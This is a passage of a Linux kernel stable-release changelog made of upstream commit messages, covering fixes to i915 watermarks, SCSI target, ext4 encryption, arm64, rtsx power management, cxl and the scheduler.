Signed-off-by: Lyude <cpaul@redhat.com>
Cc: Maarten Lankhorst <maarten.lankhorst@linux.intel.com>
Fixes: 62e0fb8801 ("drm/i915/skl: Update plane watermarks atomically during plane updates")
Signed-off-by: Lyude <cpaul@redhat.com>
Testcase: kms_plane
Signed-off-by: Maarten Lankhorst <maarten.lankhorst@linux.intel.com>
Link: http://patchwork.freedesktop.org/patch/msgid/1472488288-27280-1-git-send-email-cpaul@redhat.com
Cc: drm-intel-fixes@lists.freedesktop.org
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 27082493e9 upstream.
Now that we can hook into update_crtcs and control the order in which we
update CRTCs at each modeset, we can finish the final step of fixing
Skylake's watermark handling by performing DDB updates at the same time
as plane updates and watermark updates.
The first major change in this patch is skl_update_crtcs(), which
handles ensuring that we order each CRTC update in our atomic commits
properly so that they honor the DDB flush order.
The second major change in this patch is the order in which we flush the
pipes. While the previous order may have worked, it can't be used in
this approach since it no longer will do the right thing. For example,
using the old ddb flush order:
We have pipes A, B, and C enabled, and we're disabling C. Initial ddb
allocation looks like this:
| A | B |xxxxxxx|
Since we're performing the ddb updates after performing any CRTC
disablements in intel_atomic_commit_tail(), the space to the right of
pipe B is unallocated.
1. Flush pipes with new allocation contained into old space. None
apply, so we skip this
2. Flush pipes having their allocation reduced, but overlapping with a
previous allocation. None apply, so we also skip this
3. Flush pipes that got more space allocated. This applies to A and B,
giving us the following update order: A, B
This is wrong, since updating pipe A first will cause it to overlap with
B and potentially burst into flames. Our new order (see the code
comments for details) would update the pipes in the proper order: B, A.
As well, we calculate the order for each DDB update during the check
phase, and reference it later in the commit phase when we hit
skl_update_crtcs().
This long overdue patch fixes the rest of the underruns on Skylake.
Changes since v1:
- Add skl_ddb_entry_write() for cursor into skl_write_cursor_wm()
Changes since v2:
- Use the method for updating CRTCs that Ville suggested
- In skl_update_wm(), only copy the watermarks for the crtc that was
passed to us
Changes since v3:
- Small comment fix in skl_ddb_allocation_overlaps()
Changes since v4:
- Remove the second loop in intel_update_crtcs() and use Ville's
suggestion for updating the ddb allocations in the right order
- Get rid of the second loop and just use the ddb state as it updates
to determine what order to update everything in (thanks for the
suggestion Ville)
- Simplify skl_ddb_allocation_overlaps()
- Split actual overlap checking into it's own helper
Fixes: 0e8fb7ba7c ("drm/i915/skl: Flush the WM configuration")
Fixes: 8211bd5bdf ("drm/i915/skl: Program the DDB allocation")
[omitting CC for stable, since this patch will need to be changed for
such backports first]
Testcase: kms_cursor_legacy
Testcase: plane-all-modeset-transition
Signed-off-by: Lyude <cpaul@redhat.com>
Cc: Ville Syrjälä <ville.syrjala@linux.intel.com>
Cc: Daniel Vetter <daniel.vetter@intel.com>
Cc: Radhakrishna Sripada <radhakrishna.sripada@intel.com>
Cc: Hans de Goede <hdegoede@redhat.com>
Cc: Matt Roper <matthew.d.roper@intel.com>
Signed-off-by: Maarten Lankhorst <maarten.lankhorst@linux.intel.com>
Link: http://patchwork.freedesktop.org/patch/msgid/1471961565-28540-2-git-send-email-cpaul@redhat.com
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 62e0fb8801 upstream.
Thanks to Ville for suggesting this as a potential solution to pipe
underruns on Skylake.
On Skylake all of the registers for configuring planes, including the
registers for configuring their watermarks, are double buffered. New
values written to them won't take effect until said registers are
"armed", which is done by writing to the PLANE_SURF (or in the case of
cursor planes, the CURBASE register) register.
With this in mind, up until now we've been updating watermarks on skl
like this:
non-modeset {
- calculate (during atomic check phase)
- finish_atomic_commit:
- intel_pre_plane_update:
- intel_update_watermarks()
- {vblank happens; new watermarks + old plane values => underrun }
- drm_atomic_helper_commit_planes_on_crtc:
- start vblank evasion
- write new plane registers
- end vblank evasion
}
or
modeset {
- calculate (during atomic check phase)
- finish_atomic_commit:
- crtc_enable:
- intel_update_watermarks()
- {vblank happens; new watermarks + old plane values => underrun }
- drm_atomic_helper_commit_planes_on_crtc:
- start vblank evasion
- write new plane registers
- end vblank evasion
}
Now we update watermarks atomically like this:
non-modeset {
- calculate (during atomic check phase)
- finish_atomic_commit:
- intel_pre_plane_update:
- intel_update_watermarks() (wm values aren't written yet)
- drm_atomic_helper_commit_planes_on_crtc:
- start vblank evasion
- write new plane registers
- write new wm values
- end vblank evasion
}
modeset {
- calculate (during atomic check phase)
- finish_atomic_commit:
- crtc_enable:
- intel_update_watermarks() (actual wm values aren't written
yet)
- drm_atomic_helper_commit_planes_on_crtc:
- start vblank evasion
- write new plane registers
- write new wm values
- end vblank evasion
}
So this patch moves all of the watermark writes into the right place;
inside of the vblank evasion where we update all of the registers for
each plane. While this patch doesn't fix everything, it does allow us to
update the watermark values in the way the hardware expects us to.
Changes since original patch series:
- Remove mutex_lock/mutex_unlock since they don't do anything and we're
not touching global state
- Move skl_write_cursor_wm/skl_write_plane_wm functions into
intel_pm.c, make externally visible
- Add skl_write_plane_wm calls to skl_update_plane
- Fix conditional for for loop in skl_write_plane_wm (level < max_level
should be level <= max_level)
- Make diagram in commit more accurate to what's actually happening
- Add Fixes:
Changes since v1:
- Use IS_GEN9() instead of IS_SKYLAKE() since these fixes apply to more
then just Skylake
- Update description to make it clear this patch doesn't fix everything
- Check if pipes were actually changed before writing watermarks
Changes since v2:
- Write PIPE_WM_LINETIME during vblank evasion
Changes since v3:
- Rebase against new SAGV patch changes
Changes since v4:
- Add a parameter to choose what skl_wm_values struct to use when
writing new plane watermarks
Changes since v5:
- Remove cursor ddb entry write in skl_write_cursor_wm(), defer until
patch 6
- Write WM_LINETIME in intel_begin_crtc_commit()
Changes since v6:
- Remove redundant dirty_pipes check in skl_write_plane_wm (we check
this in all places where we call this function, and it was supposed
to have been removed earlier anyway)
- In i9xx_update_cursor(), use dev_priv->info.gen >= 9 instead of
IS_GEN9(dev_priv). We do this everywhere else and I'd imagine this
needs to be done for gen10 as well
Changes since v7:
- Fix rebase fail (unused variable obj)
- Make struct skl_wm_values *wm const
- Fix indenting
- Use INTEL_GEN() instead of dev_priv->info.gen
Changes since v8:
- Don't forget calls to skl_write_plane_wm() when disabling planes
- Use INTEL_GEN(), not INTEL_INFO()->gen in intel_begin_crtc_commit()
Fixes: 2d41c0b59a ("drm/i915/skl: SKL Watermark Computation")
Signed-off-by: Lyude <cpaul@redhat.com>
Reviewed-by: Matt Roper <matthew.d.roper@intel.com>
Cc: stable@vger.kernel.org
Cc: Ville Syrjälä <ville.syrjala@linux.intel.com>
Cc: Daniel Vetter <daniel.vetter@intel.com>
Cc: Radhakrishna Sripada <radhakrishna.sripada@intel.com>
Cc: Hans de Goede <hdegoede@redhat.com>
Signed-off-by: Maarten Lankhorst <maarten.lankhorst@linux.intel.com>
Link: http://patchwork.freedesktop.org/patch/msgid/1471884608-10671-1-git-send-email-cpaul@redhat.com
Link: http://patchwork.freedesktop.org/patch/msgid/1471884608-10671-1-git-send-email-cpaul@redhat.com
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 4973ca9a01 upstream.
The Akai MIDImix (09e8:0031) is a MIDI fader controller that speaks
regular MIDI and works well with Linux. However, initialization gets
delayed due to reports timeout:
[3643645.631124] hid-generic 0003:09E8:0031.0020: timeout initializing reports
[3643645.632416] hid-generic 0003:09E8:0031.0020: hiddev0: USB HID v1.11 Device [AKAI MIDI Mix] on usb-0000:00:14.0-2/input0
Adding "usbhid.quirks=0x09e8:0x0031:0x20000000" on the kernel
command line makes the issues go away.
Signed-off-by: Steinar H. Gunderson <sgunderson@bigfoot.com>
Signed-off-by: Jiri Kosina <jkosina@suse.cz>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6cc4758ae9 upstream.
Since using clk_register_divider to setup the pixel clock, regmap
is no longer used. Regmap did take care of DCU using different
endianness. Check endianness using the device-tree property
"big-endian" to determine the location of DIV_RATIO.
Fixes: 2d701449bc ("drm/fsl-dcu: use common clock framework for pixel clock divider")
Reported-by: Meng Yi <meng.yi@nxp.com>
Signed-off-by: Stefan Agner <stefan@agner.ch>
Tested-by: Meng Yi <meng.yi@nxp.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 51ab70bed9 upstream.
With older hardware versions, the user could specify arbitrarily large
command buffer sizes, causing a vmalloc / vmap space exhaustion.
Signed-off-by: Thomas Hellstrom <thellstrom@vmware.com>
Reviewed-by: Brian Paul <brianp@vmware.com>
Reviewed-by: Sinclair Yeh <syeh@vmware.com>
Signed-off-by: Sinclair Yeh <syeh@vmware.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 140c94da3c upstream.
All other amdgpu/dce_v* files have this call, it's only mysteriously
missing from dce_v11_0.c since the file was added and causes leaks.
Fixes: aaa36a976b ("drm/amdgpu: Add initial VI support")
Signed-off-by: Grazvydas Ignotas <notasas@gmail.com>
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7edabee06a upstream.
With the introduction of bin/render pipelining, the previous job may
not be completed when we start binning the next one. If the previous
job wrote our VBO, IB, or CS textures, then the binning stage might
get stale or uninitialized results.
Fixes the major rendering failure in glmark2 -b terrain.
Signed-off-by: Eric Anholt <eric@anholt.net>
Fixes: ca26d28bba ("drm/vc4: improve throughput by pipelining binning and rendering jobs")
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 61f36166c2 upstream.
This reverts commit c1ccbfe031.
Reverting this patch, as it incorrectly assumes the additional length
for INQUIRY in target_complete_cmd_with_length() is SCSI allocation
length, which breaks existing user-space code when SCSI allocation
length is smaller than additional length.
root@scsi-mq:~# sg_inq --len=4 -vvvv /dev/sdb
found bsg_major=253
open /dev/sdb with flags=0x800
inquiry cdb: 12 00 00 00 04 00
duration=0 ms
inquiry: pass-through requested 4 bytes (data-in) but got -28 bytes
inquiry: pass-through can't get negative bytes, say it got none
inquiry: got too few bytes (0)
INQUIRY resid (32) should never exceed requested len=4
inquiry: failed requesting 4 byte response: Malformed response to
SCSI command [resid=32]
AFAICT the original change was not to address a specific host issue,
so go ahead and revert to original logic for now.
Cc: Douglas Gilbert <dgilbert@interlog.com>
Cc: Martin K. Petersen <martin.petersen@oracle.com>
Cc: Sumit Rai <sumitrai96@gmail.com>
Signed-off-by: Nicholas Bellinger <nab@linux-iscsi.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 926317de33 upstream.
This patch addresses a bug where a local EXTENDED_COPY WRITE or READ
backend I/O request would always return SAM_STAT_CHECK_CONDITION,
even if underlying xcopy_pt_cmd->se_cmd generated a different
SCSI status code.
ESX host environments expect to hit SAM_STAT_RESERVATION_CONFLICT
for certain scenarios, and SAM_STAT_CHECK_CONDITION results in
non-retriable status for these cases.
Tested on v4.1.y with ESX v5.5u2+ with local IBLOCK backend copy.
Reported-by: Nixon Vincent <nixon.vincent@calsoftinc.com>
Tested-by: Nixon Vincent <nixon.vincent@calsoftinc.com>
Cc: Nixon Vincent <nixon.vincent@calsoftinc.com>
Tested-by: Dinesh Israni <ddi@datera.io>
Signed-off-by: Dinesh Israni <ddi@datera.io>
Cc: Dinesh Israni <ddi@datera.io>
Signed-off-by: Nicholas Bellinger <nab@linux-iscsi.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 449a137846 upstream.
This patch addresses a bug where EXTENDED_COPY across multiple LUNs
results in a CHECK_CONDITION when the source + destination are not
located on the same physical node.
ESX Host environments expect sense COPY_ABORTED w/ COPY TARGET DEVICE
NOT REACHABLE to be returned when this occurs, in order to signal
fallback to local copy method.
As described in section 6.3.3 of spc4r22:
"If it is not possible to complete processing of a segment because the
copy manager is unable to establish communications with a copy target
device, because the copy target device does not respond to INQUIRY,
or because the data returned in response to INQUIRY indicates
an unsupported logical unit, then the EXTENDED COPY command shall be
terminated with CHECK CONDITION status, with the sense key set to
COPY ABORTED, and the additional sense code set to COPY TARGET DEVICE
NOT REACHABLE."
Tested on v4.1.y with ESX v5.5u2+ with BlockCopy across multiple nodes.
Reported-by: Nixon Vincent <nixon.vincent@calsoftinc.com>
Tested-by: Nixon Vincent <nixon.vincent@calsoftinc.com>
Cc: Nixon Vincent <nixon.vincent@calsoftinc.com>
Tested-by: Dinesh Israni <ddi@datera.io>
Signed-off-by: Dinesh Israni <ddi@datera.io>
Cc: Dinesh Israni <ddi@datera.io>
Signed-off-by: Nicholas Bellinger <nab@linux-iscsi.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 527268df31 upstream.
This patch fixes a regression in >= v4.1.y code where the original
SCF_ACK_KREF assignment in target_get_sess_cmd() was dropped upstream
in commit 054922bb, but the series for addressing TMR ABORT_TASK +
LUN_RESET with fabric session reinstatement in commit febe562c20 still
depends on this code in transport_cmd_finish_abort().
The regression manifests itself as a se_cmd->cmd_kref +1 leak, where
ABORT_TASK + LUN_RESET can hang indefinately for a specific I_T session
for drivers using SCF_ACK_KREF, resulting in hung kthreads.
This patch has been verified with v4.1.y code.
Reported-by: Vaibhav Tandon <vst@datera.io>
Tested-by: Vaibhav Tandon <vst@datera.io>
Cc: Vaibhav Tandon <vst@datera.io>
Signed-off-by: Nicholas Bellinger <nab@linux-iscsi.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1ba0158fa6 upstream.
The libfc stack assigns exchange IDs based on the CPU the request
was received on, so we need to send the responses via the same CPU.
Otherwise the send logic gets confuses and responses will be delayed,
causing exchange timeouts on the initiator side.
Signed-off-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Nicholas Bellinger <nab@linux-iscsi.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 843741c577 upstream.
When the operation fails we also have to undo the changes
we made to ->xattr_names. Otherwise listxattr() will report
wrong lengths.
Signed-off-by: Richard Weinberger <richard@nod.at>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 559cce698e upstream.
When 'jh->b_transaction == transaction' (asserted by below)
J_ASSERT_JH(jh, (jh->b_transaction == transaction || ...
'journal->j_list_lock' will be incorrectly unlocked, since
the the lock is aquired only at the end of if / else-if
statements (missing the else case).
Signed-off-by: Taesoo Kim <tsgatesv@gmail.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Reviewed-by: Andreas Dilger <adilger@dilger.ca>
Fixes: 6e4862a5bb
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c4704a4fbe upstream.
The sysfs file /sys/fs/ext4/features/encryption was present on kernels
compiled with CONFIG_EXT4_FS_ENCRYPTION=n. This was misleading because
such kernels do not actually support ext4 encryption. Therefore, only
provide this file on kernels compiled with CONFIG_EXT4_FS_ENCRYPTION=y.
Note: since the ext4 feature files are all hardcoded to have a contents
of "supported", it really is the presence or absence of the file that is
significant, not the contents (and this change reflects that).
Signed-off-by: Eric Biggers <ebiggers@google.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 8906a8223a upstream.
i_rwsem needs to be acquired while setting an encryption policy so that
concurrent calls to FS_IOC_SET_ENCRYPTION_POLICY are correctly
serialized (especially the ->get_context() + ->set_context() pair), and
so that new files cannot be created in the directory during or after the
->empty_dir() check.
Signed-off-by: Eric Biggers <ebiggers@google.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Reviewed-by: Richard Weinberger <richard@nod.at>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit fb4454376d upstream.
The XTS tweak (or IV) was initialized differently on little endian and
big endian systems. Because the ciphertext depends on the XTS tweak, it
was not possible to use an encrypted filesystem created by a little
endian system on a big endian system and vice versa, even if they shared
the same PAGE_SIZE. Fix this by always using little endian.
This will break hypothetical big endian users of ext4 or f2fs
encryption. However, all users we are aware of are little endian, and
it's believed that "real" big endian users are unlikely to exist yet.
So this might as well be fixed now before it's too late.
Signed-off-by: Eric Biggers <ebiggers@google.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a5efb6b6c9 upstream.
Usually a validity intercept is a programming error of the host
because of invalid entries in the state description.
We can get a validity intercept if the mode of the runtime
instrumentation control block is wrong. As the host does not know
which modes are valid, this can be used by userspace to trigger
a WARN.
Instead of printing a WARN let's return an error to userspace as
this can only happen if userspace provides a malformed initial
value (e.g. on migration). The kernel should never warn on bogus
input. Instead let's log it into the s390 debug feature.
While at it, let's return -EINVAL for all validity intercepts as
this will trigger an error in QEMU like
error: kvm run failed Invalid argument
PSW=mask 0404c00180000000 addr 000000000063c226 cc 00
R00=000000000000004f R01=0000000000000004 R02=0000000000760005 R03=000000007fe0a000
R04=000000000064ba2a R05=000000049db73dd0 R06=000000000082c4b0 R07=0000000000000041
R08=0000000000000002 R09=000003e0804042a8 R10=0000000496152c42 R11=000000007fe0afb0
[...]
This will avoid an endless loop of validity intercepts.
Fixes: c6e5f16637 ("KVM: s390: implement the RI support of guest")
Acked-by: Fan Zhang <zhangfan@linux.vnet.ibm.com>
Reviewed-by: Pierre Morel <pmorel@linux.vnet.ibm.com>
Signed-off-by: Christian Borntraeger <borntraeger@de.ibm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 4f48aa7a11 upstream.
Accesses of the rtsx sdmmc's parent device, which is the rtsx usb device,
must be done when it's runtime resumed. Currently this isn't case when
changing the led, so let's fix this by adding a pm_runtime_get_sync() and
a pm_runtime_put() around those operations.
Reported-by: Ritesh Raj Sarraf <rrs@researchut.com>
Tested-by: Ritesh Raj Sarraf <rrs@researchut.com>
Cc: Alan Stern <stern@rowland.harvard.edu>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 31cf742f51 upstream.
The rtsx_usb_sdmmc driver may bail out in its ->set_ios() callback when no
SD card is inserted. This is wrong, as it could cause the device to remain
runtime resumed when it's unused. Fix this behaviour.
Tested-by: Ritesh Raj Sarraf <rrs@researchut.com>
Cc: Alan Stern <stern@rowland.harvard.edu>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1720d3545b upstream.
When introducing hs400es, I didn't notice that we haven't
switched voltage to 1V2 or 1V8 for it. That happens to work
as the first controller claiming to support hs400es, arasan(5.1),
which is designed to only support 1V8. So the voltage is fixed to 1V8.
But it actually is wrong, and will not fit for other host controllers.
Let's fix it.
Fixes: commit 81ac2af657 ("mmc: core: implement enhanced strobe support")
Signed-off-by: Shawn Lin <shawn.lin@rock-chips.com>
Reviewed-by: Douglas Anderson <dianders@chromium.org>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d2cf909cda upstream.
If a cxl adapter faults on an invalid address for a kernel context, we
may enter copro_calculate_slb() with a NULL mm pointer (kernel
context) and an effective address which looks like a user
address. Which will cause a crash when dereferencing mm. It is clearly
an AFU bug, but there's no reason to crash either. So return an error,
so that cxl can ack the interrupt with an address error.
Fixes: 73d16a6e0e ("powerpc/cell: Move data segment faulting code out of cell platform")
Signed-off-by: Frederic Barrat <fbarrat@linux.vnet.ibm.com>
Acked-by: Ian Munsie <imunsie@au1.ibm.com>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0d7718f666 upstream.
In case __ceph_do_getattr returns an error and the retry_op in
ceph_read_iter is not READ_INLINE, then it's possible to invoke
__free_page on a page which is NULL, this naturally leads to a crash.
This can happen when, for example, a process waiting on a MDS reply
receives sigterm.
Fix this by explicitly checking whether the page is set or not.
Signed-off-by: Nikolay Borisov <kernel@kyup.com>
Reviewed-by: Yan, Zheng <zyan@redhat.com>
Signed-off-by: Ilya Dryomov <idryomov@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 60e21a0ef5 upstream.
The WnR bit in the HSR/ESR_EL2 indicates whether a data abort was
generated by a read or a write instruction. For stage 2 data aborts
generated by a stage 1 translation table walk (i.e. the actual page
table access faults at EL2), the WnR bit therefore reports whether the
instruction generating the walk was a load or a store, *not* whether the
page table walker was reading or writing the entry.
For page tables marked as read-only at stage 2 (e.g. due to KSM merging
them with the tables from another guest), this could result in livelock,
where a page table walk generated by a load instruction attempts to
set the access flag in the stage 1 descriptor, but fails to trigger
CoW in the host since only a read fault is reported.
This patch modifies the arm64 kvm_vcpu_dabt_iswrite function to
take into account stage 2 faults in stage 1 walks. Since DBM cannot be
disabled at EL2 for CPUs that implement it, we assume that these faults
are always causes by writes, avoiding the livelock situation at the
expense of occasional, spurious CoWs.
We could, in theory, do a bit better by checking the guest TCR
configuration and inspecting the page table to see why the PTE faulted.
However, I doubt this is measurable in practice, and the threat of
livelock is real.
Cc: Julien Grall <julien.grall@arm.com>
Reviewed-by: Marc Zyngier <marc.zyngier@arm.com>
Reviewed-by: Christoffer Dall <christoffer.dall@linaro.org>
Signed-off-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 87261d1904 upstream.
Commit 7dd01aef05 ("arm64: trap userspace "dc cvau" cache operation on
errata-affected core") adds code to execute cache maintenance instructions
in the kernel on behalf of userland on CPUs with certain ARM CPU errata.
It turns out that the address hasn't been checked to be a valid user
space address, allowing userland to clean cache lines in kernel space.
Fix this by introducing an address check before executing the
instructions on behalf of userland.
Since the address doesn't come via a syscall parameter, we can't just
reject tagged pointers and instead have to remove the tag when checking
against the user address limit.
Fixes: 7dd01aef05 ("arm64: trap userspace "dc cvau" cache operation on errata-affected core")
Reported-by: Kristina Martsenko <kristina.martsenko@arm.com>
Signed-off-by: Andre Przywara <andre.przywara@arm.com>
[will: rework commit message + replace access_ok with max_user_addr()]
Signed-off-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 850540351b upstream.
Commit f436b2ac90 ("arm64: kernel: fix architected PMU registers
unconditional access") made sure we wouldn't access unimplemented
PMU registers, but also left MDCR_EL2 uninitialized in that case,
leading to trap bits being potentially left set.
Make sure we always write something in that register.
Fixes: f436b2ac90 ("arm64: kernel: fix architected PMU registers unconditional access")
Cc: Lorenzo Pieralisi <lorenzo.pieralisi@arm.com>
Cc: Will Deacon <will.deacon@arm.com>
Signed-off-by: Marc Zyngier <marc.zyngier@arm.com>
Signed-off-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1e6e57d9b3 upstream.
Writing the outer loop of an LL/SC sequence using do {...} while
constructs potentially allows the compiler to hoist memory accesses
between the STXR and the branch back to the LDXR. On CPUs that do not
guarantee forward progress of LL/SC loops when faced with memory
accesses to the same ERG (up to 2k) between the failed STXR and the
branch back, we may end up livelocking.
This patch avoids this issue in our percpu atomics by rewriting the
outer loop as part of the LL/SC inline assembly block.
Fixes: f97fc81079 ("arm64: percpu: Implement this_cpu operations")
Reviewed-by: Mark Rutland <mark.rutland@arm.com>
Tested-by: Mark Rutland <mark.rutland@arm.com>
Signed-off-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9c0e83c371 upstream.
As it turns out, the KASLR code breaks CONFIG_MODVERSIONS, since the
kcrctab has an absolute address field that is relocated at runtime
when the kernel offset is randomized.
This has been fixed already for PowerPC in the past, so simply wire up
the existing code dealing with this issue.
Fixes: f80fb3a3d5 ("arm64: add support for kernel ASLR")
Tested-by: Timur Tabi <timur@codeaurora.org>
Signed-off-by: Ard Biesheuvel <ard.biesheuvel@linaro.org>
Signed-off-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1c5b51dfb7 upstream.
If a CPU does not implement a global monitor for certain memory types,
then userspace can attempt a kernel DoS by issuing SWP instructions
targetting the problematic memory (for example, a framebuffer mapped
with non-cacheable attributes).
The SWP emulation code protects against these sorts of attacks by
checking for pending signals and potentially rescheduling when the STXR
instruction fails during the emulation. Whilst this is good for avoiding
livelock, it harms emulation of legitimate SWP instructions on CPUs
where forward progress is not guaranteed if there are memory accesses to
the same reservation granule (up to 2k) between the failing STXR and
the retry of the LDXR.
This patch solves the problem by retrying the STXR a bounded number of
times (4) before breaking out of the LL/SC loop and looking for
something else to do.
Fixes: bd35a4adc4 ("arm64: Port SWP/SWPB emulation support from arm")
Reviewed-by: Mark Rutland <mark.rutland@arm.com>
Signed-off-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9158cb29e7 upstream.
Accesses to the rtsx usb device, which is the parent of the rtsx memstick
device, must not be done unless it's runtime resumed. This is currently not
the case and it could trigger various errors.
Fix this by properly deal with runtime PM in this regards. This means
making sure the device is runtime resumed, when serving requests via the
->request() callback or changing settings via the ->set_param() callbacks.
Cc: Ritesh Raj Sarraf <rrs@researchut.com>
Cc: Alan Stern <stern@rowland.harvard.edu>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 796aa46adf upstream.
Accesses to the rtsx usb device, which is the parent of the rtsx memstick
device, must not be done unless it's runtime resumed.
Therefore when the rtsx_usb_ms driver polls for inserted memstick cards,
let's add pm_runtime_get|put*() to make sure accesses is done when the
rtsx usb device is runtime resumed.
Reported-by: Ritesh Raj Sarraf <rrs@researchut.com>
Tested-by: Ritesh Raj Sarraf <rrs@researchut.com>
Signed-off-by: Alan Stern <stern@rowland.harvard.edu>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a2ed0b391d upstream.
When isofs_mount() is called to mount a device read-write, it returns
EACCES even before it checks that the device actually contains an isofs
filesystem. This may confuse mount(8) which then tries to mount all
subsequent filesystem types in read-only mode.
Fix the problem by returning EACCES only once we verify that the device
indeed contains an iso9660 filesystem.
Fixes: 17b7f7cf58
Reported-by: Kent Overstreet <kent.overstreet@gmail.com>
Reported-by: Karel Zak <kzak@redhat.com>
Signed-off-by: Jan Kara <jack@suse.cz>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 70b565bbdb upstream.
This patch prevents resetting the cxl adapter via sysfs in presence of
one or more active cxl_context on it. This protects against an
unrecoverable error caused by PSL owning a dirty cache line even after
reset and host tries to touch the same cache line. In case a force reset
of the card is required irrespective of any active contexts, the int
value -1 can be stored in the 'reset' sysfs attribute of the card.
The patch introduces a new atomic_t member named contexts_num inside
struct cxl that holds the number of active context attached to the card
, which is checked against '0' before proceeding with the reset. To
prevent against a race condition where a context is activated just after
reset check is performed, the contexts_num is atomically set to '-1'
after reset-check to indicate that no more contexts can be activated on
the card anymore.
Before activating a context we atomically test if contexts_num is
non-negative and if so, increment its value by one. In case the value of
contexts_num is negative then it indicates that the card is about to be
reset and context activation is error-ed out at that point.
Fixes: 62fa19d4b4 ("cxl: Add ability to reset the card")
Acked-by: Frederic Barrat <fbarrat@linux.vnet.ibm.com>
Reviewed-by: Andrew Donnellan <andrew.donnellan@au1.ibm.com>
Signed-off-by: Vaibhav Jain <vaibhav@linux.vnet.ibm.com>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b60205c7c5 upstream.
While going through enqueue/dequeue to review the movement of
set_curr_task() I noticed that the (2nd) update_min_vruntime() call in
dequeue_entity() is suspect.
It turns out, its actually wrong because it will consider
cfs_rq->curr, which could be the entry we just normalized. This mixes
different vruntime forms and leads to fail.
The purpose of the second update_min_vruntime() is to move
min_vruntime forward if the entity we just removed is the one that was
holding it back; _except_ for the DEQUEUE_SAVE case, because then we
know its a temporary removal and it will come back.
However, since we do put_prev_task() _after_ dequeue(), cfs_rq->curr
will still be set (and per the above, can be tranformed into a
different unit), so update_min_vruntime() should also consider
curr->on_rq. This also fixes another corner case where the enqueue
(which also does update_curr()->update_min_vruntime()) happens on the
rq->lock break in schedule(), between dequeue and put_prev_task.
Signed-off-by: Peter Zijlstra (Intel) <peterz@infradead.org>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Mike Galbraith <efault@gmx.de>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Thomas Gleixner <tglx@linutronix.de>
Cc: linux-kernel@vger.kernel.org
Fixes: 1e87623178 ("sched: Fix ->min_vruntime calculation in dequeue_entity()")
Signed-off-by: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b5a9b34078 upstream.
A scheduler performance regression has been reported by Joseph Salisbury,
which he bisected back to:
3d30544f02 ("sched/fair: Apply more PELT fixes)
The regression triggers when several levels of task groups are involved
(read: SystemD) and cpu_possible_mask != cpu_present_mask.
The root cause is that group entity's load (tg_child->se[i]->avg.load_avg)
is initialized to scale_load_down(se->load.weight). During the creation of
a child task group, its group entities on possible CPUs are attached to
parent's cfs_rq (tg_parent) and their loads are added to the parent's load
(tg_parent->load_avg) with update_tg_load_avg().
But only the load on online CPUs will then be updated to reflect real load,
whereas load on other CPUs will stay at the initial value.
The result is a tg_parent->load_avg that is higher than the real load, the
weight of group entities (tg_parent->se[i]->load.weight) on online CPUs is
smaller than it should be, and the task group gets a less running time than
